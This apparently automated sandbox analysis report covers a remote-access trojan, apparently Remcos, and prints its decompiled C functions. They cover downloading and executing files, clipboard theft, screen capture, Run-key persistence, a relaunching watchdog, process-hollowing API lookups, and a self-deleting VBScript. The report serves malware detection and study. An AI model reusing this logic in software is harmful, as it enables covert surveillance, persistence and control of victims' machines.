                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 006D5DA3
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 006D5E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: open
                                    • API String ID: 2825088817-2758837156
                                    • Opcode ID: 1896e7b0cd53f1aaf68b3d6da77e13c9780422f1e097ae9c5d905eca22cbe45d
                                    • Instruction ID: 8591b5ae4641d505681e854576471e8270b25ece323938e643ce5c6982e7a8a2
                                    • Opcode Fuzzy Hash: 1896e7b0cd53f1aaf68b3d6da77e13c9780422f1e097ae9c5d905eca22cbe45d
                                    • Instruction Fuzzy Hash: 3061F871E0430067CB54FBB5D8669BE73AB9F96300F00092FF8475F7D2EE648A098256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32 ref: 006D9BDF
                                    • GetClipboardData.USER32 ref: 006D9BEB
                                    • CloseClipboard.USER32(?,006D9C74,006D92D9,?,00000000,00000000), ref: 006D9BF3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: 757618872f279e080d543849b853aa36d534f6472d970c95da5ba60b7fcd6155
                                    • Instruction ID: cdc42f084abb4dab6eaa6331215d48d232d1b82bf6ce1c9ecbf511ccde0f71b4
                                    • Opcode Fuzzy Hash: 757618872f279e080d543849b853aa36d534f6472d970c95da5ba60b7fcd6155
                                    • Instruction Fuzzy Hash: D4E08671A44214ABC720EBA2EC09B997B95AB04B91F054026F9099A351DE789A01C6F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006FF9CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • Opcode ID: 7c682331735c43932f20384225cec83bc9866ce933ee63d7c38537894702b785
                                    • Instruction ID: 9df64bcfbb1b5083fe800866f05c9eae4a85c48c19e0c86828a49adeb0d345b1
                                    • Opcode Fuzzy Hash: 7c682331735c43932f20384225cec83bc9866ce933ee63d7c38537894702b785
                                    • Instruction Fuzzy Hash: 9141BD71A00209EBEB18CF69D9867AABBF4FB48315F20C53AD549E7354E3789940CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E006DCD09() {
                                    				_Unknown_base(*)()* _t2;
                                    				_Unknown_base(*)()* _t24;
                                    
                                    				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
                                    				 *0x73bd2c = _t2;
                                    				if(_t2 == 0) {
                                    					 *0x73bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                    				}
                                    				 *0x73bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                    				if( *0x73bd2c == 0) {
                                    					 *0x73bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                    				}
                                    				 *0x73bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                                    				 *0x73bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                    				 *0x73beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                    				 *0x73beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                    				 *0x73bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                                    				 *0x73bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                    				 *0x73bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                    				 *0x73bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                    				 *0x73bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                    				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                    				 *0x73bb04 = _t24;
                                    				return _t24;
                                    			}


                                    APIs
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,0073C548,00000001,006DC505), ref: 006DCD1C
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD25
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 006DCD40
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD43
                                    • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 006DCD54
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD57
                                    • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 006DCD71
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD74
                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 006DCD85
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD88
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006DCD99
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCD9C
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 006DCDAD
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDB0
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 006DCDC1
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDC4
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 006DCDD5
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDD8
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 006DCDE9
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCDEC
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 006DCDFD
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE00
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 006DCE11
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE14
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 006DCE25
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE28
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 006DCE36
                                    • GetProcAddress.KERNEL32(00000000), ref: 006DCE39
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule$LibraryLoad
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                    • API String ID: 551388010-3474354060
                                    • Opcode ID: a87527bf8e150b06e3d414be395fe143ec9561e3a46328979f7d20c6b163bbd2
                                    • Instruction ID: 2478b9249250baaa49f9baf7062def5b17960ac9a2177a896d8346717b2af3da
                                    • Opcode Fuzzy Hash: a87527bf8e150b06e3d414be395fe143ec9561e3a46328979f7d20c6b163bbd2
                                    • Instruction Fuzzy Hash: 9421E3E1F9139C75F610BBB25C6ED1B2D58EA85B51F009816F20497192DBBCC510CFE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E006E4906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                                    				void* _v12;
                                    				char _v13;
                                    				struct HDC__* _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				int _v32;
                                    				int _v36;
                                    				struct HDC__* _v40;
                                    				void* _v46;
                                    				intOrPtr _v50;
                                    				intOrPtr _v54;
                                    				char _v56;
                                    				char _v80;
                                    				intOrPtr _v84;
                                    				struct tagCURSORINFO _v100;
                                    				signed int _v106;
                                    				signed int _v108;
                                    				long _v116;
                                    				long _v120;
                                    				char _v124;
                                    				struct _ICONINFO _v144;
                                    				char _v168;
                                    				void* __ebx;
                                    				int _t114;
                                    				void* _t115;
                                    				void* _t116;
                                    				void* _t120;
                                    				int _t127;
                                    				void* _t128;
                                    				signed char _t140;
                                    				long _t146;
                                    				void* _t147;
                                    				int _t149;
                                    				void* _t157;
                                    				void* _t186;
                                    				void* _t188;
                                    				void* _t194;
                                    				int _t199;
                                    				void* _t204;
                                    				void* _t223;
                                    				signed int _t226;
                                    				struct HDC__* _t228;
                                    				struct HDC__* _t232;
                                    				struct tagBITMAPINFO* _t234;
                                    				void* _t235;
                                    				int _t241;
                                    
                                    				_v13 = __edx;
                                    				_t194 = __ecx;
                                    				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                                    				_v20 = _t232;
                                    				_t228 = CreateCompatibleDC(_t232);
                                    				_v40 = _t228;
                                    				_v32 = E006E4D3D( *((intOrPtr*)(0x73bd78 + _a4 * 4)));
                                    				_t114 = E006E4D89( *((intOrPtr*)(0x73bd78 + _a4 * 4)));
                                    				_t199 = _v32;
                                    				_v36 = _t114;
                                    				if(_t199 != 0 || _t114 != 0) {
                                    					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                                    					_v12 = _t115;
                                    					__eflags = _t115;
                                    					if(_t115 != 0) {
                                    						_t116 = SelectObject(_t228, _t115);
                                    						__eflags = _t116;
                                    						if(_t116 != 0) {
                                    							_v28 = _v28 & 0x00000000;
                                    							_v24 = _v24 & 0x00000000;
                                    							E006E4DCA( *((intOrPtr*)(0x73bd78 + _a4 * 4)),  &_v28);
                                    							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                                    							__eflags = _t120;
                                    							if(_t120 == 0) {
                                    								goto L7;
                                    							}
                                    							__eflags = _v13;
                                    							if(_v13 != 0) {
                                    								_v100.cbSize = 0x14;
                                    								_t186 = GetCursorInfo( &_v100);
                                    								__eflags = _t186;
                                    								if(_t186 != 0) {
                                    									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                                    									__eflags = _t188;
                                    									if(_t188 != 0) {
                                    										_t241 = _v84 - _v144.yHotspot - _v24;
                                    										__eflags = _t241;
                                    										DeleteObject(_v144.hbmColor);
                                    										DeleteObject(_v144.hbmMask);
                                    										_t228 = _v40;
                                    										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                                    										_t232 = _v20;
                                    									}
                                    								}
                                    							}
                                    							_push( &_v124);
                                    							_t127 = 0x18;
                                    							_t128 = GetObjectA(_v12, _t127, ??);
                                    							__eflags = _t128;
                                    							if(_t128 == 0) {
                                    								goto L7;
                                    							} else {
                                    								_t226 = _v106 * _v108 & 0x0000ffff;
                                    								__eflags = _t226 - 1;
                                    								if(_t226 != 1) {
                                    									_push(4);
                                    									_pop(1);
                                    									_a4 = 1;
                                    									__eflags = _t226 - 1;
                                    									if(_t226 <= 1) {
                                    										L24:
                                    										__eflags = 1 << 1;
                                    										_push(0x2eb6edc);
                                    										L25:
                                    										_t234 = LocalAlloc(0x40, ??);
                                    										_t204 = 0x18;
                                    										_t234->bmiHeader = 0x28;
                                    										_t234->bmiHeader.biWidth = _v120;
                                    										_t234->bmiHeader.biHeight = _v116;
                                    										_t234->bmiHeader.biPlanes = _v108;
                                    										_t234->bmiHeader.biBitCount = _v106;
                                    										_t140 = _a4;
                                    										__eflags = _t140 - _t204;
                                    										if(_t140 < _t204) {
                                    											__eflags = 1;
                                    											_t234->bmiHeader.biClrUsed = 1 << _t140;
                                    										}
                                    										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                                    										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                                    										asm("cdq");
                                    										_t227 = _t226 & 0x00000007;
                                    										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                                    										_t234->bmiHeader.biSizeImage = _t146;
                                    										_t147 = GlobalAlloc(0, _t146);
                                    										_a4 = _t147;
                                    										__eflags = _t147;
                                    										if(_t147 != 0) {
                                    											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                                    											__eflags = _t149;
                                    											if(_t149 != 0) {
                                    												_v56 = 0x4d42;
                                    												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                    												_v50 = 0;
                                    												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                    												__eflags = _t157;
                                    												_v46 = _t157;
                                    												E006D20D5(_t194,  &_v80);
                                    												E006D20D5(_t194,  &_v168);
                                    												E006D251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                                    												E006D3436( &_v80);
                                    												E006D251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                                    												E006D3436( &_v80);
                                    												_t235 = _a4;
                                    												E006D251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                                    												E006D3436( &_v80);
                                    												DeleteObject(_v12);
                                    												GlobalFree(_t235);
                                    												DeleteDC(_v20);
                                    												DeleteDC(_t228);
                                    												E006D2044(_t194, _t194, __eflags,  &_v168);
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												goto L32;
                                    											}
                                    											DeleteDC(_v20);
                                    											DeleteDC(_t228);
                                    											DeleteObject(_v12);
                                    											GlobalFree(_a4);
                                    											goto L2;
                                    										} else {
                                    											_push(_v20);
                                    											L8:
                                    											DeleteDC();
                                    											DeleteDC(_t228);
                                    											_push(_v12);
                                    											goto L5;
                                    										}
                                    									}
                                    									_push(8);
                                    									_pop(1);
                                    									_a4 = 1;
                                    									__eflags = _t226 - 1;
                                    									if(_t226 <= 1) {
                                    										goto L24;
                                    									}
                                    									_push(0x10);
                                    									_pop(1);
                                    									_a4 = 1;
                                    									__eflags = _t226 - 1;
                                    									if(_t226 <= 1) {
                                    										goto L24;
                                    									}
                                    									_t223 = 0x18;
                                    									__eflags = _t226 - _t223;
                                    									if(_t226 > _t223) {
                                    										_push(0x20);
                                    										_pop(1);
                                    										L23:
                                    										_a4 = 1;
                                    										goto L24;
                                    									}
                                    									_a4 = _t223;
                                    									_push(0x28);
                                    									goto L25;
                                    								}
                                    								goto L23;
                                    							}
                                    						}
                                    						L7:
                                    						_push(_t232);
                                    						goto L8;
                                    					} else {
                                    						DeleteDC(_t232);
                                    						DeleteDC(_t228);
                                    						_push(0);
                                    						L5:
                                    						DeleteObject();
                                    						goto L2;
                                    					}
                                    				} else {
                                    					L2:
                                    					E006D2084(_t194, _t194, 0x72f6bc);
                                    					L32:
                                    					return _t194;
                                    				}
                                    			}

                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006E4921
                                    • CreateCompatibleDC.GDI32(00000000), ref: 006E492D
                                    • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 006E497B
                                    • DeleteDC.GDI32(00000000), ref: 006E498F
                                    • DeleteDC.GDI32(00000000), ref: 006E4992
                                    • DeleteObject.GDI32(?), ref: 006E4996
                                    • SelectObject.GDI32(00000000,00000000), ref: 006E49A0
                                    • DeleteDC.GDI32(00000000), ref: 006E49B1
                                    • DeleteDC.GDI32(00000000), ref: 006E49B4
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 006E49F0
                                    • GetCursorInfo.USER32(?,?,?), ref: 006E4A0B
                                    • GetIconInfo.USER32(?,?), ref: 006E4A1F
                                    • DeleteObject.GDI32(?), ref: 006E4A44
                                    • DeleteObject.GDI32(?), ref: 006E4A4D
                                    • DrawIcon.USER32 ref: 006E4A5C
                                    • GetObjectA.GDI32(?,00000018,?), ref: 006E4A70
                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 006E4AD6
                                    • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 006E4B3F
                                    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 006E4B63
                                    • DeleteDC.GDI32(?), ref: 006E4B76
                                    • DeleteDC.GDI32(00000000), ref: 006E4B79
                                    • DeleteObject.GDI32(?), ref: 006E4B7E
                                    • GlobalFree.KERNEL32 ref: 006E4B88
                                    • DeleteObject.GDI32(?), ref: 006E4C2D
                                    • GlobalFree.KERNEL32 ref: 006E4C34
                                    • DeleteDC.GDI32(?), ref: 006E4C43
                                    • DeleteDC.GDI32(00000000), ref: 006E4C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
                                    • String ID: DISPLAY
                                    • API String ID: 860969378-865373369
                                    • Opcode ID: 3172f92cab3b659c704e324b27ff9a8ad77c755772dd1d9cc5460d03d65daa61
                                    • Instruction ID: ff00a4fdebab9da88cbcfb0f73e1a87002ae56ee4cf3ce1a9dfd7395aac45774
                                    • Opcode Fuzzy Hash: 3172f92cab3b659c704e324b27ff9a8ad77c755772dd1d9cc5460d03d65daa61
                                    • Instruction Fuzzy Hash: 30B16F71E01219AFDB20DFA5DC45BEEBBBAEF44710F008019F945E7250DB38AA45CB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E006DFD95() {
                                    				long _v8;
                                    				char _v32;
                                    				short _v556;
                                    				short _v1076;
                                    				short _v1596;
                                    				short _v2116;
                                    				void* _t27;
                                    				void* _t28;
                                    				void* _t31;
                                    				long _t37;
                                    				int _t41;
                                    				long _t50;
                                    				void* _t55;
                                    				void* _t68;
                                    				void* _t70;
                                    				int _t71;
                                    				void* _t72;
                                    				long _t73;
                                    				void* _t110;
                                    				void* _t112;
                                    				void* _t115;
                                    				void* _t116;
                                    
                                    				_t71 = 0;
                                    				_v8 = _t73;
                                    				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                                    				GetModuleFileNameW(0,  &_v2116, 0x104);
                                    				_t27 = E006D2489();
                                    				_t28 = E006D1F95(0x73c560);
                                    				_t108 = 0x73c518;
                                    				_t31 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v556, 0x208, _t28, _t27);
                                    				_t116 = _t115 + 0x14;
                                    				if(_t31 != 0) {
                                    					E006D20D5(0,  &_v32);
                                    					if(E006E79DC( &_v556,  &_v32) == 0) {
                                    						goto L1;
                                    					}
                                    					_t110 = OpenProcess(0x100000, 0, _v8);
                                    					WaitForSingleObject(_t110, 0xffffffff);
                                    					CloseHandle(_t110);
                                    					_t37 = GetCurrentProcessId();
                                    					if(E006E0BB0(0x73c518, E006D1F95(0x73c518), "WDH", _t37) == 0) {
                                    						L18:
                                    						_push(1);
                                    						L2:
                                    						ExitProcess();
                                    					}
                                    					_t108 = ShellExecuteW;
                                    					do {
                                    						_t41 = PathFileExistsW( &_v556);
                                    						_t42 =  &_v556;
                                    						if(_t41 != 0) {
                                    							L11:
                                    							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                                    							L12:
                                    							do {
                                    								_t72 = E006E0885(E006D1F95(0x73c518), "WD",  &_v8);
                                    								_t122 = _t72;
                                    								if(_t72 == 0) {
                                    									Sleep(0x1f4);
                                    								} else {
                                    									E006E0CE2(E006D1F95(0x73c518), _t122, "WD");
                                    								}
                                    							} while (_t72 == 0);
                                    							goto L17;
                                    						}
                                    						_t55 = E006D2489();
                                    						if(E006E7947(E006D1F95( &_v32), _t55,  &_v556, _t71) == 0) {
                                    							E00701F00(_t108,  &_v1596, _t71, 0x208);
                                    							_t116 = _t116 + 0xc;
                                    							GetTempPathW(0x104,  &_v1596);
                                    							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                                    							lstrcatW( &_v1076, L".exe");
                                    							_t68 = E006D2489();
                                    							_t70 = E006E7947(E006D1F95( &_v32), _t68,  &_v1076, _t71);
                                    							__eflags = _t70;
                                    							if(_t70 == 0) {
                                    								goto L12;
                                    							}
                                    							_t42 =  &_v1076;
                                    							goto L11;
                                    						}
                                    						_t42 =  &_v556;
                                    						goto L11;
                                    						L17:
                                    						_t71 = 0;
                                    						_t112 = OpenProcess(0x100000, 0, _v8);
                                    						WaitForSingleObject(_t112, 0xffffffff);
                                    						CloseHandle(_t112);
                                    						_t50 = GetCurrentProcessId();
                                    					} while (E006E0BB0(0x73c518, E006D1F95(0x73c518), "WDH", _t50) != 0);
                                    					goto L18;
                                    				}
                                    				L1:
                                    				_push(_t71);
                                    				goto L2;
                                    			}

                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0073C578,0073C518,00000000), ref: 006DFDAE
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006DFDC1
                                      • Part of subcall function 006E0A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                      • Part of subcall function 006E0A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                      • Part of subcall function 006E0A30: RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    • ExitProcess.KERNEL32 ref: 006DFE08
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 006DFE31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006DFE3C
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFE43
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFE49
                                    • PathFileExistsW.SHLWAPI(?), ref: 006DFE7A
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 006DFF49
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 006DFF9F
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 006DFFAA
                                    • CloseHandle.KERNEL32(00000000), ref: 006DFFB1
                                    • GetCurrentProcessId.KERNEL32 ref: 006DFFB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
• Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                                    • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                                    • API String ID: 2645874385-232273909
                                    • Opcode ID: a3cc4e65a94d855b261ebd063ce953ab8109c2da247c8125055ba7b4973aef61
                                    • Instruction ID: 302b3a5c33ca826a48e355d34867b1f366930503cca517aa805274e5c013efe8
                                    • Opcode Fuzzy Hash: a3cc4e65a94d855b261ebd063ce953ab8109c2da247c8125055ba7b4973aef61
                                    • Instruction Fuzzy Hash: 3D51B871E00209BFDB10AB609C59EFE33AEAB05710F10416AF505A7392DF7C9E468798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 98%
                                    			E006DB0E2(char _a4) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				short _v692;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __ebp;
                                    				void* _t53;
                                    				void* _t54;
                                    				void* _t57;
                                    				signed int _t61;
                                    				void* _t62;
                                    				void* _t78;
                                    				void* _t79;
                                    				void* _t92;
                                    				void* _t93;
                                    				signed char _t134;
                                    				void* _t243;
                                    				void* _t245;
                                    				void* _t246;
                                    				void* _t247;
                                    
                                    				E006E015B();
                                    				if( *0x73a9d4 != 0x30) {
                                    					E006D9D73();
                                    				}
                                    				_t243 =  *0x73bd6b - 1; // 0x0
                                    				if(_t243 == 0) {
                                    					E006E537E(_t243);
                                    				}
                                    				if( *0x73ba75 != 0) {
                                    					E006E7754(E006D1EEB(0x73c0e0));
                                    				}
                                    				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                    				_t245 =  *0x73bb02 - 1; // 0x0
                                    				if(_t245 == 0) {
                                    					E006E0D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E006D1EEB(0x73c4e8));
                                    				}
                                    				_t246 =  *0x73bafb - 1; // 0x0
                                    				if(_t246 == 0) {
                                    					E006E0D5C(0x80000002, _t231, E006D1EEB(0x73c4e8));
                                    				}
                                    				_t247 =  *0x73bb00 - 1; // 0x0
                                    				if(_t247 == 0) {
                                    					E006E0D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E006D1EEB(0x73c4e8));
                                    				}
                                    				_t53 = E006D2489();
                                    				_t54 = E006D1F95(0x73c560);
                                    				_t57 = E006E0A30(E006D1F95(0x73c518), "exepath",  &_v692, 0x208, _t54, _t53);
                                    				_t248 = _t57;
                                    				if(_t57 == 0) {
                                    					GetModuleFileNameW(0,  &_v692, 0x208);
                                    				}
                                    				RegDeleteKeyA(0x80000001, E006D1F95(0x73c518));
                                    				_t61 = SetFileAttributesW( &_v692, 0x80);
                                    				_t140 = 0x73c530;
                                    				asm("sbb bl, bl");
                                    				_t134 =  ~_t61 & 0x00000001;
                                    				_t62 = E006D74E4(_t248);
                                    				_t249 = _t62;
                                    				if(_t62 != 0) {
                                    					_t140 = 0x73c530;
                                    					SetFileAttributesW(E006D1EEB(0x73c530), 0x80);
                                    				}
                                    				E006D30A6(_t134,  &_v124, E006D427F(_t134,  &_v52, E0070987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                                    				E006D1EF0();
                                    				E006D4405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E006D427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                    				E006D1EF0();
                                    				_t250 = _t134;
                                    				if(_t134 != 0) {
                                    					E006D3311(E006D30A6(_t134,  &_v52, E006D4405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E006D427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    				}
                                    				E006D3311(E006D30A6(_t134,  &_v100, E006D30A6(_t134,  &_v76, E006D427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				_t251 = _t134;
                                    				if(_t134 != 0) {
                                    					E006D766C(_t134,  &_v28, 0, L"wend\n");
                                    				}
                                    				_t78 = E006D74E4(_t251);
                                    				_t252 = _t78;
                                    				if(_t78 != 0) {
                                    					E006D3311(E006D30A6(0x72f724,  &_v100, E006D9E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x73c530), 0, _t252, L"\"\n"));
                                    					E006D1EF0();
                                    					E006D1EF0();
                                    				}
                                    				_t79 = E006D427F(0x72f724,  &_v172, L"\"\"\", 0");
                                    				E006D3311(E006D30A6(0x72f724,  &_v100, E006D3030( &_v76, E006D4429(0x72f724,  &_v52, E006D427F(0x72f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D766C(0x72f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                    				_t92 = E006D1EEB( &_v124);
                                    				_t93 = E006D2489();
                                    				if(E006E7947(E006D1EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E006D1EEB( &_v124), 0x72f724, 0x72f724, 0) > 0x20) {
                                    					ExitProcess(0);
                                    				}
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				return E006D1EF0();
                                    			}

                                    APIs
                                      • Part of subcall function 006E015B: TerminateProcess.KERNEL32(00000000,?,006DAD95), ref: 006E016B
                                      • Part of subcall function 006E015B: WaitForSingleObject.KERNEL32(000000FF,?,006DAD95), ref: 006E017E
